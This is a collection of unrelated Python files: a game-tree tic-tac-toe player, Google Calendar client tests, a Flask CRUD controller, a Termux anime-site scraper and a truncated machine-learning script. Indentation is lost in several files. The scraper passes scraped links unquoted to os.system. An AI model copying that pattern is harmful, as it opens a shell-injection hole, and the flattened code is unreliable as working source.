def _generate_download_link(base_url: URL, code: str) -> URL:
return base_url.with_query(gzip=base64.urlsafe_b64encode(gzip.compress(code.encode())).decode())
async def generate_download_link_handler(request: Request) -> Response:
print(request.base_url)
print(request.headers)
try:
json_data = await request.json()
except ValueError:
return Response(status_code=400)
if (
not isinstance(json_data, dict)
or json_data.keys() != {"code", "base_url"}
or not isinstance(json_data["base_url"], str)
or not isinstance(json_data["code"], str)
):
return Response(status_code=400)
try:
base_url = URL(json_data["base_url"])
except ValueError:
return Response(status_code=400)
code = json_data["code"]
download_link = _generate_download_link(URL(base_url), code)
return JSONResponse({
"download_link": str(download_link),
})
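# A small companion sketch (an assumption, not part of the handler above): how a
# consumer of the generated link could recover the original code from the "gzip"
# query parameter. The helper name _decode_download_link is hypothetical.
def _decode_download_link(link: URL) -> str:
    # Reverse of _generate_download_link: base64-decode, then gunzip.
    return gzip.decompress(base64.urlsafe_b64decode(link.query["gzip"])).decode()
# Example round trip:
#   link = _generate_download_link(URL("https://example.com/d"), "print('hi')")
#   assert _decode_download_link(link) == "print('hi')"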
|
import copy
import random
import sys
# ------------------------------------------------------------------
def aux_print (elem):
if elem == 0:
return " . "
if elem == 1:
return " X "
if elem == -1:
return " O "
def mostra_tabuleiro(T):
for x in range (0,(9)):
if (x == 3 or x == 6):
print ("\n")
print (aux_print (T[x]), end = ""),
print ("\n")
# ------------------------------------------------------------------
# returns the list of actions that can be executed from a given state
def acoes(T):
lista=[]
for i in range (0,(9)):
if T[i]==0:
lista.append(i)
return lista
# ------------------------------------------------------------------
# returns the state that results from taking a state and executing an action
def resultado(T,a,jog):
aux = copy.copy(T)
if aux[a]==0:
if jog == 'MAX':
aux[a]=1
else:
aux[a]=-1
return aux
# ------------------------------------------------------------------
# there are 8 possible winning alignments for each player
def utilidade(T):
    # test the rows
for i in (0,3,6):
if (T[i] == T[i+1] == T[i+2]):
if (T[i] == 1):
return 1
elif (T[i] == -1):
return -1
    # test the columns
for i in (0,1,2):
if (T[i] == T[i+3] == T[i+6]):
if (T[i] == 1):
return 1
elif (T[i] == -1):
return -1
    # test the diagonals
if (T[0] == T[4] == T[8]):
if (T[0] == 1):
return 1
elif (T[0] == -1):
return -1
if (T[2] == T[4] == T[6]):
if (T[2] == 1):
return 1
elif (T[2] == -1):
return -1
    # not a winning leaf node, or it is a draw
return 0
# ------------------------------------------------------------------
# returns True if T is terminal, otherwise returns False
def estado_terminal(T):
x = utilidade(T)
if (x == 0):
for x in range (0,9):
if (T[x] == 0):
return (False)
return (True)
# ------------------------------------------------------------------
# algorithm from Wikipedia
# https://en.wikipedia.org/wiki/Alpha%E2%80%93beta_pruning
# we ignore the depth and return the value, the action and the resulting state
def alfabeta(T,alfa,beta,jog):
if estado_terminal(T):
return utilidade(T),-1,-1
if jog:
v = -10
ba=-1
for a in acoes(T):
v1,ac,es = alfabeta(resultado(T,a,'MAX'),alfa,beta,False)
            if v1 > v:  # keep the action corresponding to the best value
v = v1
ba=a
alfa = max(alfa,v)
if beta <= alfa:
break
return v,ba,resultado(T,ba,'MAX')
else:
        # MIN player branch
v = 10
ba= -1
for a in acoes(T):
v1,ac,es = alfabeta(resultado(T,a,'MIN'),alfa,beta,True)
            if v1 < v:  # keep the action corresponding to the best value
v = v1
ba=a
            beta = min(beta, v)
if beta <= alfa :
break
return v,ba,resultado(T,ba,'MIN')
# ------------------------------------------------------------------
def joga_max(T):
v,a,e = alfabeta(T,-10,10,True)
    print('MAX plays at', a)
return e
# ------------------------------------------------------------------
def joga_min(T):
v,a,e = alfabeta(T,-10,10,False)
    print('MIN plays at', a)
return e
# ------------------------------------------------------------------
def jogo(p1,p2):
    # create an empty board
T = [0,0,0,0,0,0,0,0,0]
mostra_tabuleiro(T)
while acoes(T) != [] and not estado_terminal(T):
T=p1(T)
mostra_tabuleiro(T)
if acoes(T) != [] and not estado_terminal(T):
T=p2(T)
mostra_tabuleiro(T)
    # end of game
    if utilidade(T) == 1:
        print('Player 1 wins')
    elif utilidade(T) == -1:
        print('Player 2 wins')
    else:
        print('Draw')
# ------------------------------------------------------------------
# random player
def joga_rand(T):
x = random.randint(0,8)
i = True
while i:
if (T[x] == 0):
T=resultado(T,x,'MIN')
i = False
else:
x = random.randint(0,8)
    print('RAND plays at', x)
return T
# ------------------------------------------------------------------
#--------- Human player
def joga_utilizador(T):
print ("Introduza a posicao para que quer jogar:")
posicao = int(input("—> "))
disponiveis = acoes(T)
while posicao not in disponiveis:
posicao = int(input("—> "))
T = resultado(T, posicao, 'MIN')
    print('USER plays at', posicao)
return T
# main
# max should always win:
#jogo(joga_max,joga_rand)
# they should always draw:
#jogo(joga_max,joga_min)
# human player vs ZI MACHINE
jogo(joga_max, joga_utilizador)
|
#!/usr/bin/python
# -*- coding:UTF-8 -*-
if __name__ == '__main__':
l1 = [3, [66, 55, 44], (7, 8, 9)]
l2 = list(l1)
l1.append(100)
l1[1].remove(55)
print('l1:', l1)
print('l2:', l2)
l2[1] += [33, 22]
    l2[2] += (10, 11)  # for a tuple, += creates a brand-new tuple
print('l1:', l1)
print('l2:', l2)
|
import json
import unittest
from libsaas import port
from libsaas.executors import test_executor
from libsaas.services import googlecalendar
from libsaas.services.base import MethodNotSupported
class GoogleCalendarTestCase(unittest.TestCase):
def setUp(self):
self.executor = test_executor.use()
self.executor.set_response(b'{}', 200, {})
self.service = googlecalendar.GoogleCalendar(access_token='my-access-token')
def expect(self, method=None, uri=None, params={}, headers=None):
if method:
self.assertEqual(method, self.executor.request.method)
if uri:
self.assertEqual(self.executor.request.uri,
'https://www.googleapis.com/calendar/v3' + uri)
self.assertEqual(self.executor.request.params, params)
if headers:
self.assertEqual(self.executor.request.headers, headers)
def test_user(self):
with port.assertRaises(MethodNotSupported):
self.service.me().get()
with port.assertRaises(MethodNotSupported):
self.service.me().create()
with port.assertRaises(MethodNotSupported):
self.service.me().update()
with port.assertRaises(MethodNotSupported):
self.service.me().patch()
with port.assertRaises(MethodNotSupported):
self.service.me().delete()
with port.assertRaises(MethodNotSupported):
self.service.me().settings().create()
with port.assertRaises(MethodNotSupported):
self.service.me().settings().update()
with port.assertRaises(MethodNotSupported):
self.service.me().settings().patch()
with port.assertRaises(MethodNotSupported):
self.service.me().settings().delete()
self.service.me().settings().get()
self.expect('GET', '/users/me/settings', {})
with port.assertRaises(MethodNotSupported):
self.service.me().setting('1234').create()
with port.assertRaises(MethodNotSupported):
self.service.me().setting('1234').update()
with port.assertRaises(MethodNotSupported):
self.service.me().setting('1234').patch()
with port.assertRaises(MethodNotSupported):
self.service.me().setting('1234').delete()
self.service.me().setting('1234').get()
self.expect('GET', '/users/me/settings/1234', {})
with port.assertRaises(MethodNotSupported):
self.service.me().calendar_lists().update()
with port.assertRaises(MethodNotSupported):
self.service.me().calendar_lists().patch()
with port.assertRaises(MethodNotSupported):
self.service.me().calendar_lists().delete()
with port.assertRaises(MethodNotSupported):
self.service.me().calendar_list('1234').create()
self.service.me().calendar_lists().get()
self.expect('GET', '/users/me/calendarList', {})
obj = {'foo': 'bar'}
self.service.me().calendar_lists().create(obj)
self.expect('POST', '/users/me/calendarList', json.dumps(obj))
self.service.me().calendar_list('1234').get()
self.expect('GET', '/users/me/calendarList/1234', {})
self.service.me().calendar_list('1234').update(obj)
self.expect('PUT', '/users/me/calendarList/1234', json.dumps(obj))
self.service.me().calendar_list('1234').patch(obj)
self.expect('PATCH', '/users/me/calendarList/1234', json.dumps(obj))
self.service.me().calendar_list('1234').delete()
self.expect('DELETE', '/users/me/calendarList/1234', {})
def test_colors(self):
with port.assertRaises(MethodNotSupported):
self.service.colors().create()
with port.assertRaises(MethodNotSupported):
self.service.colors().update()
with port.assertRaises(MethodNotSupported):
self.service.colors().patch()
with port.assertRaises(MethodNotSupported):
self.service.colors().delete()
self.service.colors().get()
self.expect('GET', '/colors', {})
def test_freebusy(self):
with port.assertRaises(MethodNotSupported):
self.service.freebusy().get()
with port.assertRaises(MethodNotSupported):
self.service.freebusy().create()
with port.assertRaises(MethodNotSupported):
self.service.freebusy().update()
with port.assertRaises(MethodNotSupported):
self.service.freebusy().patch()
with port.assertRaises(MethodNotSupported):
self.service.freebusy().delete()
obj = {'foo': 'bar'}
self.service.freebusy().query(obj)
self.expect('POST', '/freeBusy', json.dumps(obj))
def test_calendar(self):
with port.assertRaises(MethodNotSupported):
self.service.calendars().get()
with port.assertRaises(MethodNotSupported):
self.service.calendars().update()
with port.assertRaises(MethodNotSupported):
self.service.calendars().patch()
with port.assertRaises(MethodNotSupported):
self.service.calendars().delete()
obj = {'foo': 'bar'}
self.service.calendars().create(obj)
self.expect('POST', '/calendars', json.dumps(obj))
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').create()
self.service.calendar('1234').get()
self.expect('GET', '/calendars/1234', {})
self.service.calendar('1234').update(obj)
self.expect('PUT', '/calendars/1234', json.dumps(obj))
self.service.calendar('1234').patch(obj)
self.expect('PATCH', '/calendars/1234', json.dumps(obj))
self.service.calendar('1234').delete()
self.expect('DELETE', '/calendars/1234', {})
self.service.calendar('1234').clear()
self.expect('POST', '/calendars/1234/clear', {})
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').rules().update()
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').rules().patch()
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').rules().delete()
self.service.calendar('1234').rules().get()
self.expect('GET', '/calendars/1234/acl', {})
obj = {'foo': 'bar'}
self.service.calendar('1234').rules().create(obj)
self.expect('POST', '/calendars/1234/acl', json.dumps(obj))
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').rule('1234').create()
self.service.calendar('1234').rule('1234').get()
self.expect('GET', '/calendars/1234/acl/1234', {})
self.service.calendar('1234').rule('1234').update(obj)
self.expect('PUT', '/calendars/1234/acl/1234', json.dumps(obj))
self.service.calendar('1234').rule('1234').patch(obj)
self.expect('PATCH', '/calendars/1234/acl/1234', json.dumps(obj))
self.service.calendar('1234').rule('1234').delete()
self.expect('DELETE', '/calendars/1234/acl/1234', {})
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').events().update()
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').events().patch()
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').events().delete()
self.service.calendar('1234').events().get()
self.expect('GET', '/calendars/1234/events', {})
self.service.calendar('1234').events().get(timeZone='UTC')
self.expect('GET', '/calendars/1234/events', {'timeZone': 'UTC'})
obj = {'foo': 'bar'}
self.service.calendar('1234').events().create(obj)
self.expect('POST', '/calendars/1234/events', json.dumps(obj))
self.service.calendar('1234').events().importing(obj)
self.expect('POST', '/calendars/1234/events/import', json.dumps(obj))
self.service.calendar('1234').events().quick_add('text', True)
self.expect('POST',
'/calendars/1234/events/quickAdd?text=text&sendNotifications=true')
with port.assertRaises(MethodNotSupported):
self.service.calendar('1234').event('1234').create()
self.service.calendar('1234').event('1234').get()
self.expect('GET', '/calendars/1234/events/1234', {})
self.service.calendar('1234').event('1234').instances()
self.expect('GET', '/calendars/1234/events/1234/instances', {})
self.service.calendar('1234').event('1234').instances(maxResults=1)
self.expect('GET', '/calendars/1234/events/1234/instances',
{'maxResults': 1})
self.service.calendar('1234').event('1234').update(obj)
self.expect('PUT', '/calendars/1234/events/1234', json.dumps(obj))
self.service.calendar('1234').event('1234').update(obj, True)
self.expect('PUT', '/calendars/1234/events/1234?alwaysIncludeEmail=true',
json.dumps(obj))
self.service.calendar('1234').event('1234').patch(obj)
self.expect('PATCH', '/calendars/1234/events/1234', json.dumps(obj))
self.service.calendar('1234').event('1234').patch(obj, sendNotifications=True)
self.expect('PATCH', '/calendars/1234/events/1234?sendNotifications=true',
json.dumps(obj))
self.service.calendar('1234').event('1234').delete()
self.expect('DELETE', '/calendars/1234/events/1234', {})
self.service.calendar('1234').event('1234').delete(True)
self.expect('DELETE', '/calendars/1234/events/1234?sendNotifications=true')
self.service.calendar('1234').event('1234').move('1234')
self.expect('POST', '/calendars/1234/events/1234/move?destination=1234')
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""The Controller class for Cities."""
import re
from flask import Blueprint, render_template, redirect, url_for, current_app, \
request, abort, flash
from modules.Countries.model import Country
from modules.Regions.model import Region
from modules.Cities.model import City
from modules.Shared.database import db
# collection of URLs for the cities section of the website
# setup the controller, use a local folder for templates
cities = Blueprint(
'cities',
__name__,
template_folder='templates',
static_folder='static',
url_prefix='/cities'
)
@cities.route('/')
def view_all_cities():
""" homepage with all cities in a table """
return render_template('cities/view_all.html', Cities=City)
@cities.route('/view/<city_id>')
def view_one_city(city_id):
""" view a single city in detail """
entry = City.query.get(city_id)
    if entry is not None:
return render_template('cities/view.html', entry=entry)
else:
flash('Entry does not exist.', 'error')
return redirect(url_for('cities.view_all_cities'))
@cities.route('/add', methods=['GET', 'POST'])
def add_city():
""" add a city page function """
# init variables
    entry = City() # create an empty City model instance to be populated from the form
error_msg = {}
form_is_valid = True
country_list = Country.query.all()
region_list = Region.query.all()
if request.method == 'GET':
return render_template('cities/add.html', entry=entry, \
country_list=country_list, \
region_list=region_list, \
error_msg=error_msg)
if request.method == 'POST':
# validate input
[entry, form_is_valid, error_msg] = form_validate_city(entry)
# check if the form is valid
if not form_is_valid:
# current_app.logger.info('invalid add city')
return render_template('cities/add.html', entry=entry, \
country_list=country_list, \
region_list=region_list, \
error_msg=error_msg)
# the data is valid, save it
db.session.add(entry)
db.session.commit()
return redirect(url_for('cities.view_one_city', \
city_id=entry.city_id))
# current_app.logger.error("unsupported method")
@cities.route('/edit/<city_id>', methods=['GET', 'POST'])
def edit_city(city_id):
""" edit city details """
# init variables
entry = City.query.get(city_id)
error_msg = {}
form_is_valid = True
country_list = Country.query.all()
region_list = Region.query.all()
if request.method == 'GET':
return render_template('cities/edit.html', \
entry=entry, error_msg=error_msg, \
country_list=country_list, \
region_list=region_list)
if request.method == 'POST':
# validate input
[entry, form_is_valid, error_msg] = form_validate_city(entry)
# check if the form is valid
if not form_is_valid:
# current_app.logger.info('invalid edit city: ' + str(entry))
return render_template('cities/edit.html', entry=entry, \
country_list=country_list, \
region_list=region_list, \
error_msg=error_msg)
# the data is valid, save it
db.session.commit()
return redirect(url_for('cities.view_one_city', \
city_id=entry.city_id))
# current_app.logger.error("unsupported method")
def form_validate_city(entry):
""" validate City form data """
# validate data
form_is_valid = True
error_msg = {}
# retrieve data from the global Request object
data = request.form
    if 'city_name' not in data or 'country_id' not in data or 'region_id' not in data:
        if 'city_name' not in data:
            error_msg['city_name'] = "Please fill in the city name."
        if 'country_id' not in data:
            error_msg['country_id'] = "Please choose the country."
        if 'region_id' not in data:
            error_msg['region_id'] = "Please choose the region."
form_is_valid = False
return [entry, form_is_valid, error_msg]
    # get string, drop non-ASCII characters, truncate to 127 chars, collapse repeated spaces
    entry.city_name = \
        re.sub(' +', ' ',
            data['city_name'].encode('ascii', 'ignore').decode('ascii')[:127])
# retrieve ids in the data var from the html form
if data['country_id'].isdigit():
entry.country_id = int(data['country_id'])
else:
form_is_valid = False
error_msg['country_id'] = "Please choose the country."
if data['region_id'].isdigit():
entry.region_id = int(data['region_id'])
else:
form_is_valid = False
error_msg['region_id'] = "Please choose the region."
# ensure the city_name is filled in
if not entry.city_name:
form_is_valid = False
error_msg['city_name'] = "Please fill in the city name."
# city name underflow check, 2 or less characters
if len(entry.city_name) < 3:
form_is_valid = False
error_msg['city_name'] = "Please fill in the city name completely."
# ensure the city name is letters
match = re.match('^[a-zA-Z ]*$', entry.city_name)
if not match:
form_is_valid = False
error_msg['city_name'] = "Please fill in a city name only with English letters."
# else:
# current_app.logger.info("match = " + str(match.group(0)))
# ensure country_id and region_id are chosen
if not entry.country_id:
form_is_valid = False
error_msg['country_id'] = "Please choose the country."
if not entry.region_id:
form_is_valid = False
error_msg['region_id'] = "Please choose the region."
return [entry, form_is_valid, error_msg]
@cities.route('/delete/<city_id>')
def delete_city(city_id):
""" delete a city """
entry = City.query.get(city_id)
    # abort if the entry does not exist
if entry is None:
return abort(400, 'Entry does not exist.')
db.session.delete(entry)
db.session.commit()
return redirect(url_for('cities.view_all_cities'))
|
from __future__ import print_function, absolute_import
from .image import ImageSoftmaxEngine, ImageTripletEngine, ImageHardTripletEngine
from .video import VideoSoftmaxEngine, VideoTripletEngine
from .engine import Engine
|
#!/data/data/com.termux/files/usr/bin/python
# Update : (2020-09-03 23:04:09)
# Finish : Now!
# © Copyright 2020 | Ezz-Kun | kyun-kyunnn
from bs4 import BeautifulSoup as bs_
from os import system as _Auth
from string import ascii_letters as _ascii
from time import sleep
from random import randint
import requests as req_
import sys
b = '\033[1;34m'
h = '\033[1;32m'
p = '\033[1;37m'
m = '\033[1;31m'
class _print(object):
def __init__(self,string):
for i in string +'\n':
sys.stdout.write(str(i))
sys.stdout.flush()
sleep(0.00050)
__banner__ = (f""" {b}╔═╗{p}┌─┐{b}╦ {p}┌─┐┬ ┬┌─┐┬─┐{b}╔═╗ ╦ ╦{p}┬─┐{b}╦
{b}║ ║{p}├─┘{b}║ {p}│ │└┐┌┘├┤ ├┬┘{b}╔═╝{p}───{b}║ ║{p}├┬┘{b}║
╚═╝{p}┴ {b}╩═╝{p}└─┘ └┘ └─┘┴└─{b}╚═╝ ╚═╝{p}┴└─{b}╩═╝
┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈{b}≻
{b}[{h}≈{b}]{p} Author {b}:{p} Ezz-Kun {b}|{h} (´•ω•`๑)
{b}[{h}≈{b}]{p} Tools {b}:{p} Oploverz {m}~{p} Url
{b}[{h}≈{b}]{p} Versi {b}:{p} {randint(10,999)}.{randint(10,100)} Update{m} !
{h}► {b}[{p}Oploverz{b}]{h} ◄
""")
class _OpLoverz(object):
def __init__(self,url):
if 'https://' not in url:
self.url = (f"https://www.oploverz.in/?s={url.replace(' ','+')}&post_type=post")
else:
self.url = url
self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1"}
self.judul = []
self.href_ = []
self.info = []
self.links = []
self.server = []
self.sorattl = []
self._GetInformation(self.url)
def _GetInformation(self,url_):
try:
_shogi = req_.get(url_,headers=self.headers).text
_bes = bs_(_shogi,'html.parser')
_data = _bes.findAll('div',class_='dtl')
next_ = _bes.find('a',class_='nextpostslink',rel='next')
prev_ = _bes.find('a',class_='previouspostslink',rel='prev')
if len(_data) != 0:
for cek_ in _data:
self.judul.append(cek_.find('a')["title"])
self.href_.append(cek_.find('a')["href"])
self.info.append(cek_.find('span').text)
_Auth('clear')
_print(__banner__)
for yui, yui_ in enumerate(self.judul):
_print(f' {b}[{p}{yui+1}{b}].{p}{yui_}')
                if next_ is not None:
_print(f"""
{b}[{h}» {p}{_bes.find('span',class_='pages').text} {h}«{b}]{p}
{b}[{p} Type {b}[{p}N{b}]{p} For Next Type {b}[{p}P{b}]{p} For Prev {b}]{p}""")
_cos = input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Choice {b}≽{p} ')
if _cos == '':
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Choice Is None !')
elif str(_cos) in _ascii:
if str(_cos).lower() == 'n':
_OpLoverz(next_["href"])
elif str(_cos).lower() == 'p':
                        if prev_ is not None:
_OpLoverz(prev_["href"])
else:
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Can Not Previous First Pages!')
elif str(_cos) not in _ascii:
if int(_cos)-1 < len(self.href_):
# print(self.href_)
self._downloadPages(self.href_[int(_cos)-1])
else:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Your Choice Out Of Index!')
else:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Invalid Choice!')
else:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Title ``url`` Not Found In Oploverz')
except req_.exceptions.ConnectionError:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} No Internet Connection{m}!')
except (EOFError,KeyboardInterrupt):
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Passing{m}!{p}')
def _downloadPages(self,_url):
try:
_shogi = req_.get(_url,headers=self.headers).text
_bes = bs_(_shogi,'html.parser')
sora_ttl = _bes.findAll('div',class_='sorattl title-download')
sora_url = _bes.findAll('div',class_='soraurl list-download')
            for _ttl in sora_ttl:
                self.sorattl.append(_ttl.text.split(' – ')[-1])
_Auth('clear')
_print(__banner__)
for ciu, ciu_ in enumerate(self.sorattl):
_print(f' {b}[{p}{ciu+1}{b}].{p}{ciu_}')
_sor = int(input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Choice {b}≽{p} '))
if (_sor-1) < len(sora_url):
for cek in sora_url[_sor-1].findAll('a'):
self.server.append(cek.text)
self.links.append(cek["href"])
for serv, serv_ in enumerate(self.server):
_print(f' {b}[{p}{serv+1}{b}].{p}{serv_} {b}≽{p} {self.links[serv]}')
_opz = int(input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Open To Browser {b}≽{p} '))
if (_opz-1) < len(self.links):
# print(self.links[_opz-1])
_Auth(f'termux-open {self.links[_opz-1]}')
_OpLoverz(self.url)
else:
                    exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Your Choice Out Of Range{m}!{p}')
else:
                exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Your Choice Out Of Range{m}!{p}')
except req_.exceptions.ConnectionError:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} No Internet Connection{m}!')
except (EOFError,KeyboardInterrupt,ValueError):
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Passing{m}!{p}')
def _MainOpz():
_Auth('clear')
_print(__banner__)
print(f""" {b}[{p}01{b}].{p}Search Title
{b}[{p}02{b}].{p}More Information
{b}[{p}03{b}].{p}Exit""")
try:
_cus = int(input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Choice {b}≽{p} '))
if _cus == '':
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Choice Is Nothing!')
elif _cus == 1:
_Auth('clear')
_print(__banner__)
jdl_ = input(f' {b}[{h}»{p}Opz{h}«{b}]{p} Title {b}≽{p} ')
if jdl_ == '':
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Title Is Nothing!')
else:
_OpLoverz(jdl_)
elif _cus == 2:
_print(f"""
{m}▪{p} Gak Ada Yang Beda ,Cuman Fix Error Doang Gak Ada
Function Auto Download Nya, Sengaja Lewat Open Browser
Biar Bisa Ke UC Browser& Download Juga Jadi Wuzz.. Wuzz..
{m}▪{p} Yang Nama Nya Web Anime Ya Pasti Gak Ada Yang
Lengkap, Kalau Anime Yang Di Cari Gak Ada Di Oploverz
Bisa Pake Yg Neonime, Kalau Batch Bisa Pake Yg Kusonime
{b}▪{p} Versi KusoNime {b}≽{p} https://github.com/Ezz-Kun/kusonime-url
{b}▪{p} Versi NeoNime {b}≽{p} https://github.com/Ezz-Kun/neonime-url
{h}▪{p} Contact Wa : 085325463021
""")
input(f' {b}[{h}»{p}Opz{h}«{b}]{p} Enter To Back!')
_MainOpz()
elif _cus == 3:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Exit Tools{m}!')
else:
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Invalid Choice!')
except (ValueError,KeyboardInterrupt,EOFError):
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Something Error{m}!{p}')
if __name__=="__main__":
_MainOpz()
|
# This script has been designed to perform multi-objective learning of core sets
# by Alberto Tonda and Pietro Barbiero, 2018 <alberto.tonda@gmail.com> <pietro.barbiero@studenti.polito.it>
#basic libraries
import argparse
import copy
import datetime
import inspyred
import matplotlib.pyplot as plt
import numpy as np
import random
import os
import sys
import logging
import time
import tensorflow as tf
# sklearn library
from sklearn import datasets
from sklearn.datasets import make_blobs, make_circles, make_moons
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import ElasticNet
from sklearn.linear_model import ElasticNetCV
from sklearn.linear_model import Lasso
from sklearn.linear_model import LassoCV
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LogisticRegressionCV
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.linear_model import RidgeClassifier
from sklearn.linear_model import RidgeClassifierCV
from sklearn.linear_model import SGDClassifier
from sklearn.svm import SVC
# pandas
from pandas import read_csv
import seaborn as sns
from matplotlib.colors import ListedColormap
import warnings
warnings.filterwarnings("ignore")
def main(selectedDataset = "digits", pop_size = 100, max_generations = 100):
# a few hard-coded values
figsize = [5, 4]
seed = 42
max_points_in_core_set = 99
min_points_in_core_set = 1 # later redefined as 1 per class
# pop_size = 300
offspring_size = 2 * pop_size
# max_generations = 300
maximize = False
# selectedDataset = "digits"
selectedClassifiers = ["SVC"]
n_splits = 10
# a list of classifiers
allClassifiers = [
[RandomForestClassifier, "RandomForestClassifier", 1],
[BaggingClassifier, "BaggingClassifier", 1],
[SVC, "SVC", 1],
[RidgeClassifier, "RidgeClassifier", 1],
# [AdaBoostClassifier, "AdaBoostClassifier", 1],
# [ExtraTreesClassifier, "ExtraTreesClassifier", 1],
# [GradientBoostingClassifier, "GradientBoostingClassifier", 1],
# [SGDClassifier, "SGDClassifier", 1],
# [PassiveAggressiveClassifier, "PassiveAggressiveClassifier", 1],
# [LogisticRegression, "LogisticRegression", 1],
]
selectedClassifiers = [classifier[1] for classifier in allClassifiers]
folder_name = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M") + "-evocore2C-" + selectedDataset + "-" + str(pop_size)
if not os.path.exists(folder_name) :
os.makedirs(folder_name)
else :
sys.stderr.write("Error: folder \"" + folder_name + "\" already exists. Aborting...\n")
sys.exit(0)
# open the logging file
logfilename = os.path.join(folder_name, 'logfile.log')
logger = setup_logger('logfile_' + folder_name, logfilename)
logger.info("All results will be saved in folder \"%s\"" % folder_name)
# load different datasets, prepare them for use
logger.info("Preparing data...")
# synthetic databases
# centers = [[1, 1], [-1, -1], [1, -1]]
# blobs_X, blobs_y = make_blobs(n_samples=400, centers=centers, n_features=2, cluster_std=0.6, random_state=seed)
# circles_X, circles_y = make_circles(n_samples=400, noise=0.15, factor=0.4, random_state=seed)
# moons_X, moons_y = make_moons(n_samples=400, noise=0.2, random_state=seed)
# iris = datasets.load_iris()
# digits = datasets.load_digits()
wine = datasets.load_wine()
# breast = datasets.load_breast_cancer()
# pairs = datasets.fetch_lfw_pairs()
# olivetti = datasets.fetch_olivetti_faces()
# forest_X, forest_y = loadForestCoverageType() # local function
# mnist_X, mnist_y = loadMNIST() # local function
# plants = datasets.fetch_openml(name='one-hundred-plants-margin', cache=False)
# isolet = datasets.fetch_openml(name='isolet', cache=False)
# ctg = datasets.fetch_openml(name='cardiotocography', cache=False)
# ozone = datasets.fetch_openml(name='ozone-level-8hr', cache=False)
# ilpd = datasets.fetch_openml(name='ilpd', cache=False)
# biodeg = datasets.fetch_openml(name='qsar-biodeg', cache=False)
# hill = datasets.fetch_openml(name='hill-valley', cache=False)
dataList = [
# [blobs_X, blobs_y, 0, "blobs"],
# [circles_X, circles_y, 0, "circles"],
# [moons_X, moons_y, 0, "moons"],
# [iris.data, iris.target, 0, "iris4"],
# [iris.data[:, 2:4], iris.target, 0, "iris2"],
# [digits.data, digits.target, 0, "digits"],
[wine.data, wine.target, 0, "wine"],
# [breast.data, breast.target, 0, "breast"],
# [pairs.data, pairs.target, 0, "pairs"],
# [olivetti.data, olivetti.target, 0, "people"],
# [forest_X, forest_y, 0, "covtype"],
# [mnist_X, mnist_y, 0, "mnist"],
# [plants.data, plants.target, 0, "plants"],
# [isolet.data, isolet.target, 0, "isolet"],
# [ctg.data, ctg.target, 0, "ctg"],
# [ozone.data, ozone.target, 0, "ozone"],
# [ilpd.data, ilpd.target, 0, "ilpd"],
# [biodeg.data, biodeg.target, 0, "biodeg"],
# [hill.data, hill.target, 0, "hill-valley"],
]
# argparse; all arguments are optional
parser = argparse.ArgumentParser()
parser.add_argument("--classifiers", "-c", nargs='+', help="Classifier(s) to be tested. Default: %s. Accepted values: %s" % (selectedClassifiers[0], [x[1] for x in allClassifiers]))
parser.add_argument("--dataset", "-d", help="Dataset to be tested. Default: %s. Accepted values: %s" % (selectedDataset,[x[3] for x in dataList]))
parser.add_argument("--pop_size", "-p", type=int, help="EA population size. Default: %d" % pop_size)
parser.add_argument("--offspring_size", "-o", type=int, help="Ea offspring size. Default: %d" % offspring_size)
parser.add_argument("--max_generations", "-mg", type=int, help="Maximum number of generations. Default: %d" % max_generations)
parser.add_argument("--min_points", "-mip", type=int, help="Minimum number of points in the core set. Default: %d" % min_points_in_core_set)
parser.add_argument("--max_points", "-mxp", type=int, help="Maximum number of points in the core set. Default: %d" % max_points_in_core_set)
# finally, parse the arguments
args = parser.parse_args()
# a few checks on the (optional) inputs
if args.dataset :
selectedDataset = args.dataset
if selectedDataset not in [x[3] for x in dataList] :
print("Error: dataset \"%s\" is not an accepted value. Accepted values: %s" % (selectedDataset, [x[3] for x in dataList]))
sys.exit(0)
if args.classifiers != None and len(args.classifiers) > 0 :
selectedClassifiers = args.classifiers
for c in selectedClassifiers :
if c not in [x[1] for x in allClassifiers] :
print("Error: classifier \"%s\" is not an accepted value. Accepted values: %s" % (c, [x[1] for x in allClassifiers]))
sys.exit(0)
if args.min_points : min_points_in_core_set = args.min_points
if args.max_points : max_points_in_core_set = args.max_points
if args.max_generations : max_generations = args.max_generations
